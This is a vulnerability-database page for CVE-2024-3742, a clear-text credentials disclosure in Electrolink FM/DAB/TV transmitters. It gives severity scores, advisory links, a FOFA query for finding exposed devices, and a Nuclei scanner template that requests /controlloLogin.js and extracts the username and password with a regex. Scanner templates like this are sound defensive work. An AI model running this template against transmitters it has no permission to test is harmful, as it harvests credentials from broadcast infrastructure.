Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2024-3742
HistoryJul 12, 2024 - 10:33 a.m.

Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure

2024-07-1210:33:11
ProjectDiscovery
github.com
5
electrolink transmitter
credentials disclosure
javascript
packetstorm
cve2024
info leak

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS4

8.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N

AI Score

6.7

Confidence

Low

EPSS

0.001

Percentile

22.1%

JSON
Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.

id: CVE-2024-3742

info:
  name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
  author: Farish
  severity: high
  description: |
    Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3742
    - https://packetstormsecurity.com/files/174875/
    - https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-02
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-3742
    cwe-id: CWE-312
    epss-score: 0.00043
    epss-percentile: 0.09257
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Electrolink s.r.l."
  tags: packetstorm,cve,cve2024,electrolink,info-leak

http:
  - raw:
      - |
        GET /controlloLogin.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/x-javascript")'
          - 'contains(body, "user==") && contains(body, "password==")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - user\s*==\s*'([^']*)'\s*&&\s*password\s*==\s*'([^']*)'
# digest: 4b0a00483046022100fb98544e07456340954c4f62a7fba54fd48004b17fc8c4467598d82d475c67930221009322487501ba03e3e27364380b95536bdb5220ca300567fb9a189d5f8df249f0:922c64590222798bb761d5b6d8e72950

Related

zeroscience 2
vulnrichment 1
cve 1
cvelist 1
nvd 1
ics 1
zeroscience
zeroscience
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure
2023-09-30 00:00:00
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure
2023-09-30 00:00:00
vulnrichment
vulnrichment
CVE-2024-3742 Electrolink FM/DAB/TV Transmitter Cleartext Storage of Sensitive Information
2024-04-18 22:15:35
cve
cve
CVE-2024-3742
2024-04-18 23:15:07
cvelist
cvelist
CVE-2024-3742 Electrolink FM/DAB/TV Transmitter Cleartext Storage of Sensitive Information
2024-04-18 22:15:35
nvd
nvd
CVE-2024-3742
2024-04-18 23:15:07
ics
ics
Electrolink FM/DAB/TV Transmitter
2024-04-16 12:00:00

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS4

8.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N

AI Score

6.7

Confidence

Low

EPSS

0.001

Percentile

22.1%

JSON
Related for NUCLEI:CVE-2024-3742
zeroscience2vulnrichment1cve1cvelist1nvd1ics1